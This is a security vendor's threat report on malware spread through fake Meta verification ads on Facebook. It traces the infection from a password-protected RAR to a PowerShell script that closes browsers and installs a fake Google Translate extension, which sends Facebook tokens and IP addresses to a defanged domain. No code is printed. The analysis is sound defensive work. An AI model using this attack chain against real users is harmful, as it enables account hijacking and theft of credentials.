Unmasking Deception: Malware Disguised as Meta Verification Tool
Social media scams have become an unfortunate reality, with malicious individuals and hackers constantly devising new tactics to exploit users' private data. In a disturbing development, fake Meta accounts have emerged as impostors, cunningly posing as the renowned social media giant. Their deceptive aim? To lure unsuspecting users into downloading counterfeit tools through fraudulent accounts, meticulously replicating Meta's appearance, complete with verified ticks on their profiles. Unbeknownst to the victims, these seemingly innocent downloads contain malware capable of infiltrating devices, allowing scammers to gain unauthorized access to users' social media accounts, granting them the ability to disseminate spam or unleash malicious content.
Meta Verified is a comprehensive subscription verification program designed for Instagram and Facebook, offering a range of additional benefits such as live chat customer support and protection against account impersonation.
On October 29, 2023, researchers at Nexusguard came across a Facebook Ad featuring a sponsored page that falsely claimed to provide a tool for assisting account owners in obtaining verification. The accompanying post displayed in the ad included a link and a code intended for unzipping the file.
The advertisement was shared on a compromised Facebook page, boasting a staggering 1.5 million followers at present.
Through the utilization of the page transparency feature, our team uncovered that the page in question was established on November 28, 2008.
Upon closer examination, it became evident that the page was managed by two administrators, with one administrator residing in the United States, and the other based in Vietnam.
Upon accessing the aforementioned website, a RAR archive is downloaded automatically. The file is named "AI Page verification version 1.0.4.rar." After the file is successfully downloaded, it is extracted using the password provided in the advertised post.
Initial scans showed that the file was malicious with 17 out of 61 detections.
In order to gain deeper insights into the malware, we conducted a meticulous dynamic analysis, encompassing the execution of the malicious software within a highly secure virtualized environment.
Upon careful examination, it became clear that the executed file generated a multitude of files within the directory C:\Program Files\Google\Install\nmmhkkegccagdldgiimedpic\
Following the creation of the files illustrated in Figure 8, the malware proceeded to execute ru.ps1, an intriguing PowerShell script. The contents of the PowerShell script are presented below for analysis and understanding.
The PowerShell script orchestrates the termination of Google Chrome, Microsoft Edge, and Brave browsers, while simultaneously installing a browser extension under the deceptive guise of "Google Translate." This clever disguise allows the extension to conceal its true intentions and motives.
Decoding the Malicious Extension
The primary objective of the malware is to surreptitiously install a malicious extension on Google Chrome, cunningly masquerading itself as a genuine Google Translate extension.
As depicted in the aforementioned example, the background.js file is intentionally obfuscated, serving as a clear indicator of its malicious nature.
The captured data, comprising the victims' Facebook tokens and IP addresses, is subsequently transmitted to hxxps[:]//managevds.com.
Upon conducting a thorough Google search on the domain managevds.com, we discovered that it has been blacklisted as a phishing website, indicating its malicious intent and potential threats it poses to users.
Our findings underscore the grave reality of perpetrators exploiting social engineering techniques to capitalize on the unwavering trust users place in popular social networking platforms. It is crucial for users to grasp the fact that appearances can be deceiving, even when dealing with seemingly legitimate services. As cybercriminals continue to refine their tactics with alarming sophistication, users must maintain constant vigilance, stay well-informed, and proactively adopt measures to protect their personal information and fortify their online identity.
Furthermore, it is advised to refrain from downloading any files or clicking on links within paid advertisements until Meta takes effective measures to address and resolve this issue. Engaging with such content could potentially expose users to various risks, including malware, unauthorized access, or other malicious activities. It is strongly recommended to exercise vigilance and avoid interacting with suspicious or unverified links within paid advertisements on Meta. Keep a watchful eye for any official updates or announcements from Meta regarding the resolution of this problem.
Nexusguard, renowned for its resolute commitment to cybersecurity, goes beyond mere threat intelligence development through meticulous data gathering and analysis. Our comprehensive suite of web and network application security solutions stands as a formidable defense, proficiently detecting and obstructing malicious traffic, including those targeting Facebook ads. By leveraging our proactive measures, organizations gain a distinct advantage in staying ahead of the ever-evolving threat landscape, promptly identifying emerging attack techniques before they proliferate.
For uninterrupted visibility into your cyber risk and to explore our comprehensive offerings, visit Nexusguard today.